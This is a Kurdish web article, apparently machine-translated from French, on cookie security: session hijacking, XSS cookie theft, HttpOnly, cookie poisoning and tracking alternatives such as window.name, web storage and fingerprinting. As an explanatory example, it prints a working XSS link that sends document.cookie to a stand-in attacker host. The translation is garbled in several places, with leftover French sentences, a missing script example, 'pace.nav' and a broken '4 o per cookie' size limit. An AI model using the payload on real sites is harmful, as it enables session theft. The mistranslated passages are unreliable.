Di êrîşeke ku jê re tê gotin revandina danişînê de, cookies dikarin bi rêya sniffera pakêtê werin dizîn. Trafîka li ser torê dikare ji hêla komputerên din ve ji bilî yên ku dişînin û werdigirin (bi taybetî li cîhê Wi-Fi-ya giştî ya neşîfrekirî) were girtin û xwendin. Di vê trafîkê de çerezên ku li ser danişînan bi karanîna protokola sade ya HTTP têne şandin hene. Dema ku seyrûsefera torê neyê şîfrekirin, bikarhênerên xerab dikarin bi vî rengî danûstandinên bikarhênerên din ên li ser torê bi karanîna "sniffers pakêtê" bixwînin.

Ev pirsgirêk dikare bi şîfrekirina girêdana di navbera komputera bikarhêner û serverê de bi karanîna protokola HTTPS ve were derbas kirin. Serverek dikare a diyar bike ala ewle dema sazkirina cookie; gerok dê wê tenê li ser xetek ewledar bişîne, wek girêdanek SSL.

Lêbelê, gelek malper, her çend ji bo rastkirina bikarhêner (ango rûpela têketinê) pêwendiya şîfrekirî ya HTTPS bikar tînin jî, paşê ji ber sedemên karîgeriyê bi girêdanên HTTP-ê yên neşîfrekirî, çerezên danişînê û daneyên din wekî normal dişînin. Ji ber vê yekê êrîşkar dikarin çerezên bikarhênerên din bişopînin û wan li ser malperên guncav bişopînin an jî wan di êrîşên cookie de bikar bînin.

Skrîpta li malperê: cookieyek ku divê tenê di navbera server û xerîdar de were guheztin ji partiyek sêyemîn re tê şandin.

Rêyek din a dizîna çerezan ev e ku meriv malperan binivîsîne û gerok bixwe çerezan bişîne serverên xirab ên ku qet wan nagirin. Gerokên nûjen destûrê didin darvekirina beşên kodê yên ku ji serverê têne xwestin. Ger di dema xebitandinê de çerezan têne gihîştin, dibe ku nirxên wan bi rengekî ji serverên ku negihîjin wan re bêne ragihandin. Şîfrekirina çerezan berî ku ew li ser torê werin şandin, ji bo têkbirina êrîşê alîkar nabe.

Ev celeb nivîsandina nav-malperê bi gelemperî ji hêla êrişkeran ve li ser malperên ku dihêle bikarhêneran naveroka HTML-ê bişînin tê bikar anîn. Bi entegrekirina beşek koda lihevhatî di tevkariya HTML-ê de, êrîşkar dikare ji bikarhênerên din çerezan bistîne. Agahdariya van cookies dikare bi girêdana bi heman malperê re bi karanîna cookiesên dizî ve were bikar anîn, bi vî rengî wekî bikarhênerê ku cookiesên wî hatine dizîn têne nas kirin.

Yek rê ji bo pêşîgirtina li van êrîşan ev e ku ala HttpOnly bikar bîne; ew vebijarkek e, ji guhertoya 6-ê ya Internet Explorer-ê ya di PHP-ê de ji guhertoya 5.2.0-ê ve hatî destnîşan kirin ku tê plansaz kirin ku cookie-yê ji xerîdar re nêzikî skrîptê neke. Lêbelê, pêşdebirên malperê divê di pêşveçûna malpera xwe de vê yekê bihesibînin da ku ew ji nivîsandina li malperê bêpar bin.

Metirsiyek din a ewlehiyê ya ku tê bikar anîn çêkirina daxwazê ​​​​li malperê ye.

Taybetmendiya teknîkî ya fermî dihêle ku cookies tenê ji serverên li domaina ku jê derketine vegerînin. Lêbelê, nirxa cookie-yan dikare ji serverên din re bi karanîna navgînên ji bilî sernavên cookie-yê were şandin.

Bi taybetî, zimanên nivîsandinê yên wekî JavaScript bi gelemperî têne destûr kirin ku bigihîjin nirxên cookie-yê û dikarin nirxên keyfî ji her serverek li ser Înternetê re bişînin. Vê kapasîteya nivîsandinê ji malperan tê bikar anîn ku dihêle bikarhêner naveroka HTML-ê ji bo dîtina bikarhênerên din bişînin.

Mînakî, êrîşkarek ku li ser domaina example.com dixebite dibe ku şîroveyek ku tê de lînka jêrîn heye bişîne blogek populer ku ew wekî din kontrol nakin:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Dema ku bikarhênerek din li ser vê lînkê bitikîne, gerok beşa kodê ya taybetmendiya onclick-ê dixebitîne, ji ber vê yekê ew rêzika document.cookie bi navnîşa cookiesên bikarhêner ên ku ji bo vê rûpelê çalak in diguhezîne. Ji ber vê yekê, ev navnîşa çerezan ji servera example.com re tê şandin, û ji ber vê yekê êrîşkar dikare cookiesên vî bikarhênerî berhev bike.

Ev celeb êrîş ji hêla bikarhêner ve dijwar e ku were tesbît kirin ji ber ku skrîpt ji heman domainê tê ku cookie destnîşan kiriye, û operasyona şandina nirxan ji hêla wê domainê ve hatî destûr kirin. Tê texmîn kirin ku berpirsiyariya rêvebirên ku bi vî rengî malperê dixebitin ew e ku sînorkirinên ku pêşî li weşana kodên xirab digirin bi cih bikin.

Heke ku bi ala HttpOnly re hatine şandin, çerez rasterast ji bernameyên xerîdar ên mîna JavaScript re nayên dîtin. Ji nihêrîna serverê, cûdahiya tenê ev e ku di rêza sernavê Set-Cookie de qadek nû ku tê de rêzika HttpOnly tê de tê zêdekirin:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Dema ku gerok çerezek wusa distîne, tê xwestin ku ew bi gelemperî di danûstendina HTTP-ya jêrîn de bikar bîne, lê bêyî ku ew ji nivîsarên ku li alîyê xerîdar têne darve kirin xuya bike. Ala HttpOnly ne beşek ji taybetmendiyên teknîkî yên fermî ye, û di hemî gerokan de nayê bicîh kirin. Bala xwe bidinê ku heya niha rêyek tune ku pêşî li xwendin û nivîsandina çerezên danişînê bi rêbaza XMLHTTPRequest bigire.

Guhertina naverokê: êrîşkar cookieyek nederbasdar ji serverek re dişîne, dibe ku ji cookieyek derbasdar ku ji hêla server ve hatî şandin hatî çêkirin.

Hema ku pêdivî ye ku cookie bêne hilanîn û neguhêrbar li serverê werin vegerandin, êrîşkar dikare nirxa cookieyan biguhezîne berî ku ew ji serverê re werin şandin. Mînakî, heke cookie nirxa tevahî ya ku bikarhêner divê ji bo tiştên ku di selika kirîna dikanê de hatine bicihkirin bide dihewîne, guheztina vê nirxê serverê dixe ber xetera ku êrîşkar ji bihayê destpêkê kêmtir bidiyê. Pêvajoya guherandina nirxa cookies tê gotin jehrîkirina cookie û dikare piştî dizîna cookie-yê were bikar anîn da ku êrîşê domdar bike.

Di rêbaza guheztina cookie-yê de, êrîşkar xeletiyek gerokê bikar tîne da ku cookieyek nederbasdar bişîne serverê.

Lêbelê, pir malper, tenê nasnameyek danişînê - jimareyek bêhempa ya ku ji bo nasandina bikarhênerê danişînê hatî çêkirin - di cookie bixwe de hilînin, dema ku hemî agahdariya din li ser serverê têne hilanîn. Di vê rewşê de, ev pirsgirêk bi piranî çareser dibe.

Tê payîn ku her malper xwedan çerezên xwe be, ji ber vê yekê malperek pêdivî ye ku nikaribe çerezên bi malperek din ve girêdayî biguhezîne an biafirîne. Kêmasiyek ewlehiya geroka webê dikare destûrê bide malperên xerab ku vê qaîdeyê bişkînin. Bikaranîna xeletiyek weha bi gelemperî wekî tê gotin xwarinçêkirinê cross-site. Armanca van êrîşan dibe ku dizîna nasnameya rûniştinê be.

Pêdivî ye ku bikarhêner guhertoyên herî dawî yên gerokên webê yên ku tê de ev qelsî bi rastî têne rakirin bikar bînin.

Dewlet nakokî di navbera xerîdar û serverê de

Bikaranîna cookie-yan dibe ku di navbera rewşa xerîdar û dewleta ku di cookie de hatî hilanîn de nakokî çêbike. Ger bikarhêner cookieyekê bistîne û li ser bişkoja "Veger" ya gerokê bikirtîne, rewşa gerokê bi gelemperî ne wekî berê vê wergirtinê ye. Mînakî, heke selika firotgehek serhêl bi karanîna çerezan hatî çêkirin, dema ku bikarhêner vedigere dîroka gerokê, naveroka selikê nikare were guheztin: heke bikarhêner bişkokek bikire da ku gotarek li selika xwe zêde bike û li ser "Vegere" bikirtîne. " Bişkojk, gotar di vê yekê de dimîne. Dibe ku ev ne niyeta bikarhêner be, ku bê guman dixwaze lêzêdekirina gotarê betal bike. Ev dikare bibe sedema bêbawerî, tevlihevî û xeletiyan. Ji ber vê yekê pêşdebirên malperê divê ji vê pirsgirêkê haydar bin û tedbîran bicîh bînin ku rewşên bi vî rengî birêve bibin.

Kokiyên domdar ji hêla pisporên ewlehiya nepenîtiyê ve têne rexne kirin ji ber ku zû zû bi dawî nabin, bi vî rengî destûr didin malperan ku bikarhêneran bişopînin û bi demê re profîla xwe ava bikin. Ev aliyê çerezan di heman demê de beşek ji pirsgirêka revandina danişînê ye, ji ber ku cookie-ya domdar a dizîn dikare ji bo demek girîng ji bo nepenîkirina bikarhênerek were bikar anîn.

Bo xwendin: GAFAM: ew kî ne? Çima ew (carinan) ew qas tirsnak in?

Alternatîfên cookies

Hin operasyonên ku dikarin bi karanîna cookie-yan bêne kirin jî dikarin bi karanîna mekanîzmayên din ên ku çerezan derbas dikin an jî çerezên jêbûyî ji nû ve diafirînin, ku pirsgirêkên nepenîtiyê bi heman rengî diafirînin (an carinan jî ji çerezan xirabtir ji ber ku hingê nayê dîtin).

Navnîşana IP

Bikarhêner dikarin bi navnîşana IP-ya komputera ku li ser rûpelê gazî dike têne şopandin. Ev teknîk ji destpêka danasîna tevna gerdûnî ya cîhanî ve heye, ji ber ku rûpel têne dakêşandin server navnîşana IP-ya komputera ku gerok an proxy dixebitîne daxwaz dike, heke yek neyê bikar anîn. Pêşkêşkar dikare vê agahiyê bişopîne ka çerezên ku têne bikar anîn an na. Lêbelê, ev navnîşan bi gelemperî di naskirina bikarhênerek ji cookie-yan de kêmtir pêbawer in ji ber ku dibe ku komputer û proxies ji hêla pir bikarhêneran ve werin parve kirin, û dibe ku heman komputer di her danişîna xebatê de navnîşanek IP-ya cûda werbigire (wekî c bi gelemperî ji bo girêdanên têlefonê) .

Şopandina ji hêla navnîşanên IP-ê ve dikare di hin rewşan de pêbawer be, wek mînak girêdanên berfereh ku ji bo demek dirêj heman navnîşana IP-yê diparêzin, heya ku hêz pêve be.

Hin pergalên mîna Tor têne sêwirandin ku nenasiya Înternetê biparêzin û şopandina bi navnîşana IP-yê ne mumkin an nepratîk bikin.

URL

Teknîkîyek rastîntir li ser vegirtina agahdariya di URLan de ye. Parçeya pirsê ya URL-ê teknîkek e ku bi gelemperî ji bo vê armancê tê bikar anîn, lê beşên din jî dikarin bêne bikar anîn. Hem serverleta Java û hem jî mekanîzmayên danişîna PHP-ê vê rêbazê bikar tînin heke cookies neyên çalak kirin.

Ev rêbaz tê de ye ku servera webê daxwazên rêzikê li lînkên rûpela malperê ya ku dema ku ew ji gerokê re tê şandin vedigire. Dema ku bikarhêner lînkek dişopîne, gerok rêzika pirsê ya pêvekirî vedigerîne serverê.

Rêzikên pirsê yên ku ji bo vê armancê têne bikar anîn û çerezan pir dişibin hev, hem agahdarî bi kêfî ji hêla serverê ve têne hilbijartin û hem jî ji hêla gerokê ve têne vegerandin. Lêbelê, hin cûdahî hene: dema ku URL-ya ku rêzika pirsê vedihewîne ji nû ve were bikar anîn, heman agahdarî ji serverê re tê şandin. Mînakî, heke vebijarkên bikarhênerek di rêzika pirsê ya URL-ê de were kod kirin û bikarhêner wê URL-ê bi e-nameyê ji bikarhênerek din re bişîne, ew bikarhêner jî dê bikaribe van vebijarkan bikar bîne.

Ji hêla din ve, gava bikarhênerek du caran bigihîje heman rûpelê, garantiyek tune ku heman rêzika pirsê dê her du caran jî were bikar anîn. Mînakî, heke bikarhênerek cara yekem li ser rûpelek ji rûpelek malperek hundurîn û gava duyemîn ji rûpelek derveyî li heman rûpelê davêje, rêzika pirsê li gorî rûpela malperê bi gelemperî cûda ye, dema ku cookies yek in. .

Dezawantajên din ên rêzikên pirsê bi ewlehiyê ve girêdayî ne: girtina daneya ku danişînek di rêzikên pirsnameyê de destnîşan dike, êrişên rastkirina danişînê, êrişên referansa nasnameyê, û kedkarên din çalak dike an hêsan dike. Derbaskirina nasnameyên danişînê wekî çerezên HTTP ewletir e.

Qada forma veşartî

Yek formek şopandina danişînê, ku ji hêla ASP.NET ve tê bikar anîn, karanîna formên malperê yên bi qadên veşartî ye. Ev teknîk pir dişibihe bikaranîna rêzikên pirsiyariya URL-ê ji bo hilgirtina agahiyê û xwedî heman awantaj û dezawantajan e; û heke form bi rêbaza HTTP GET were hilanîn, zevî bi rastî dibin beşek ji URL-ya geroka ku dê dema şandina formê bişîne. Lê pir form bi HTTP POST-ê têne hilberandin, ku dibe sedem ku agahdariya formê, tevî qadên veşartî, wekî têketinek zêde ku ne beşek URL-ê û ne jî cookie ye were zêdekirin.

Ev nêzîkatî ji perspektîfa şopandinê du avantajên xwe hene: yekem, şopandina agahdariya ku di koda çavkaniyê ya HTML-ê û têketina POST-ê de ji URL-ê hatî bicîh kirin dê rê bide bikarhênerê navîn ku ji vê şopandinê dûr bixe; ya duyemîn, dema ku bikarhêner URL-ê kopî dike agahdariya rûniştinê nayê kopî kirin (mînak, ji bo ku rûpelê li ser dîskê hilîne an bi e-nameyê bişîne).

pace.nav

Hemî gerokên webê yên hevpar dikarin bi karanîna taybetmendiya window.name ya DOM-ê bi JavaScript-ê gelek daneyan (2MB heta 32MB) hilînin. Ev dane dikare li şûna çerezên danişînê were bikar anîn û di nav domanan de jî tê bikar anîn. Teknîkî dikare bi hêmanên JSON re were girêdan da ku komek tevlihev a guhêrbarên danişîna alî-muwekîlê hilîne.

Nebaşî ev e ku her pencereyek an tabloyek veqetandî dê di destpêkê de pencereyek vala hebe.name; dema gera li ser tabloyan (ji hêla bikarhêner ve hatî vekirin) ev tê vê wateyê ku tabên ku bi ferdî hatine vekirin dê navek pencereyê nebin. Wekî din window.name dikare were bikar anîn da ku mêvanan li ser malperên cihêreng bişopîne ku dikare fikarek nepenîtiyê çêbike.

Di hin waran de ev dikare ji çerezan ewletir be, ji ber tevnebûna serverê, ji ber vê yekê ew ji êrîşa torê ya çerezên sniffer re neçar dibe. Lêbelê, heke ji bo parastina daneyan tedbîrên taybetî werin girtin, ew ji hêrişên din re xeternak e, ji ber ku dane ji hêla malperên din ên ku di heman pencereyê de hatine vekirin ve têne peyda kirin.

Nasnameya HTTP

Protokola HTTP di nav xwe de protokolên bingehîn ên erêkirina gihîştinê û berhevoka pejirandina gihîştinê vedihewîne, ku destûrê dide gihîştina rûpelek malperê tenê dema ku bikarhêner navê bikarhêner û şîfreya xwe daye. Ger server sertîfîkayek bixwaze ku bigihîje rûpelek malperê, gerok wê ji bikarhêner daxwaz dike û piştî ku were bidestxistin, gerok wê hilîne û di hemî daxwazên HTTP yên paşîn de dişîne. Ev agahdarî dikare were bikar anîn da ku bikarhêner bişopîne.

Objeya hevpar a herêmî

Ger gerokek pêveka Adobe Flash Player-ê vedihewîne, wê tiştên hevbeş herêmî dikare ji bo heman armancê wekî cookies were bikar anîn. Ew dikarin ji bo pêşdebirên malperê vebijarkek balkêş bin ji ber ku:

  • sînorê mezinahiya xwerû ji bo tiştek hevpar a herêmî 100 KB e;
  • kontrolên ewlehiyê ji kontrolên cookie yên bikarhêner veqetandî ne (ji ber vê yekê tiştên hevbeş ên herêmî dema ku cookies neyên destûr têne destûr kirin).

Ev xala paşîn, ku polîtîkaya rêveberiya cookie-yê ji ya tiştên hevpar ên herêmî yên Adobe cuda dike pirsan dike di derbarê rêvebirina bikarhênerê mîhengên nepenîtiyê de: divê ew hay jê hebe ku rêveberiya wî ya çerezan ti bandorek li ser rêvebirina tiştên hevpar ên herêmî tune, û berevajî.

Rexneyek din a vê pergalê ev e ku ew tenê dikare bi pêveka Adobe Flash Player-a ku xwedanî ye û ne standardek malperê ye were bikar anîn.

Berdewamiya Client-side

Hin gerokên webê mekanîzmayek domdar-based skrîptê piştgirî dikin, ku destûrê dide rûpelê ku agahdariya herêmî ji bo karanîna paşê hilîne. Mînakî, Internet Explorer, agahdariya domdar a di dîroka gerokê de, nîşangiran, di formatek ku di XML-ê de hatî hilanîn, an rasterast bi rûpelek malperê ya ku li ser dîskê hatî hilanîn piştgirî dike. Ji bo Microsoft Internet Explorer 5, rêbazek bikarhêner-daneyên ku di nav tevgerên DHTML-ê de peyda dibe heye.

W3C di HTML 5-ê de API-ya JavaScript-a nû ji bo hilanîna daneya li milê xerîdar bi navê hilanîna Web-ê destnîşan kir û armanc kir ku bi domdarî li şûna cookies bigire. Ew dişibihe çerezan e lê bi kapasîteya pir pêşkeftî û bêyî hilanîna agahiyê di serî de daxwazên HTTP. API destûrê dide du celeb hilanîna tevneyê: hilanîna herêmî û hilanîna rûniştinê, mîna çerezên domdar û çerezên danişînê (ji bilî ku çerezên danişînê dema ku gerok girtî be diqede. rûniştina rûniştinê bi rêzdarî dema ku tablo girtî ye, bi dawî dibe. Hilberîna malperê ji hêla Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 û Opera 10.50 ve tê piştgirî kirin.

Mekanîzmayek cûda bi gelemperî bi cachkirina gerokê ve girêdayî ye (di bîranînê de ne ji nûvekirinê) bi karanîna bernameyên JavaScript di rûpelên malperê de. 

Mînakî, rûpelek dikare nîşanek hebe . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

Di vê nuqteyê de, bername di bîra cache de dimîne û rûpela serdankirî carek din nayê barkirin. Ji ber vê yekê, heke bername guhêrbarek gerdûnî hebe (mînak var id = 3243242;), ev nasname derbasdar dimîne û dikare ji hêla kodek din a JavaScript-ê ve were îstismar kirin gava ku rûpel dîsa were barkirin, an carekê rûpelek ku bernameyê girêdide were barkirin. 

Kêmasiya sereke ya vê rêbazê ev e ku guhêrbara gerdûnî ya JavaScript divê statîk be, yanî ew mîna kukek nayê guheztin an jêbirin.

tiliya geroka webê

Şopa tiliya gerokê agahdariya ku di derheqê mîhengên veavakirina gerokekê de ji bo armancên nasnameyê têne berhev kirin. Ev şopa tiliyan dikare were bikar anîn da ku bi tevahî an jî qismî bikarhênerek Înternetê an amûrek nas bike, hetta dema ku cookies neçalak bibin.

Agahdariya bingehîn a veavakirina geroka webê ji mêj ve ji hêla karûbarên temaşevanên malperê ve hatî berhev kirin ji bo mebesta pîvandina rastîn a seyrûsefera tevna mirovan û tespîtkirina cûrbecûr xapandina klîk. Bi alîkariya zimanên nivîsandinê yên ji hêla xerîdar ve, berhevkirina agahdariya pir rasttir e niha gengaz e.

Veguheztina vê agahiyê di rêzek bit de şopa tiliya cîhazê çêdike. Di sala 2010 de, Weqfa Sînorê Elektronîkî (EFF) entropiya şopa tiliya gerokek bi kêmanî pîva kir. bits 18,1, û ew beriya ku pêşkeftinên di şopandina tiliyên kanavê de 5,7 bit li wê entropiyê zêde kirin.

Cookies bi kurtî

Cookie pelên nivîsê yên piçûk in ku ji hêla geroka webê ve li ser dîska serdankerek malperê têne hilanîn û têne bikar anîn (di nav tiştên din de) ji bo tomarkirina agahdariya li ser mêvan an rêwîtiya wan a di nav malperê de. Bi vî rengî webmaster dikare adetên mêvanek nas bike û pêşkêşkirina malpera xwe ji bo her mêvanek kesane bike; Dûv re çerezan dihêle ku were bîra çend gotaran ku li ser rûpelê malê were xuyang kirin an jî heta ku pêbaweriya têketinê ji bo partiyek taybetî bigire: gava ku serdan vedigere malperê, êdî ne hewce ye ku ew nav û şîfreya xwe binivîse. bêne naskirin, ji ber ku ew bixweber di cookie de têne xwendin.

A cookie xwedan jiyanek tixûbdar e, ku ji hêla sêwirana malperê ve hatî destnîşan kirin. Di heman demê de ew dikarin di dawiya rûniştina li ser malperê de, ku bi girtina gerokê re têkildar e, biqede. Cookies bi berfirehî têne bikar anîn da ku jiyanê ji mêvanan re hêsantir bikin û bêtir agahdariya têkildar pêşkêşî wan bikin. Lê teknîkên taybetî dihêle ku meriv li ser çend malperan meriv bişopîne û bi vî rengî agahdariya pir berfireh li ser adetên wî berhev bike û xaç bike. Vê rêbazê karanîna cookie-yan wekî teknîkek çavdêriyê ku nepeniya serdêran binpê dike, navûdeng daye, ku mixabin di gelek rewşên karanîna ji ber sedemên ne-teknîkî an ne rêzgirtina hêviyên bikarhêner de bi rastiyê re têkildar e. .

Di bersiva van tirsên rewa de, HTML 5 API-ya nû ya JavaScript-ê ji bo hilanîna daneya xerîdar bi navê hilanîna Webê destnîşan dike, ku pir ewletir û bi kapasîteya mezintir e, ku armanc dike ku li şûna çerezan bigire.

Storage of cookies

Bi hin gerokan re, cookie bi hêsanî tê guheztin, edîtorek nivîsê ya hêsan a mîna Notepad bes e ku bi destan nirxên xwe biguhezîne.

Li gorî gerokê, cookie bi rengek cûda têne tomar kirin:

  • Microsoft Explorer Explorer her cookie di pelek cûda de tomar dike;
  • Mozilla Firefox hemî çerezên xwe di pelek yekane de tomar dike;
  • Opîra Hemî çerezên xwe di pelek yekane de tomar dike û wan şîfre dike (ji bilî vebijarkên nermalavê guhartina wan ne gengaz e);
  • Apple Safari hemû çerezên xwe di yek pelê dirêjkirina .plist de tomar dike. Guhertin gengaz e lê ne pir hêsan e, heya ku hûn vebijarkên nermalavê derbas nekin.

Gerok hewce ne ku piştgirî bikin kêmtirînek :

  • 300 çerezên hevdem;
  • 4 o per cookie;
  • 20 çerezên her mêvandar an domainê.
[Hemî: 0 Dilxerab: 0]

nivîskar: Reviews Edîtorên

Tîma edîtorên pispor dema xwe bi lêkolîna li ser berheman, ceribandinên pratîkî, hevpeyivîna bi pisporên pîşesaziyê re, nirxandinên xerîdaran di ber çavan re derbas dike, û hemî encamên me wekî kurtayiyên têgihiştî û berfireh dinivîse.

Leave a comment

Navnîşana e-nameya we nayê weşandin. qadên pêwîst in *

Hûn çi difikirin?

384 Points
Upvote Downvote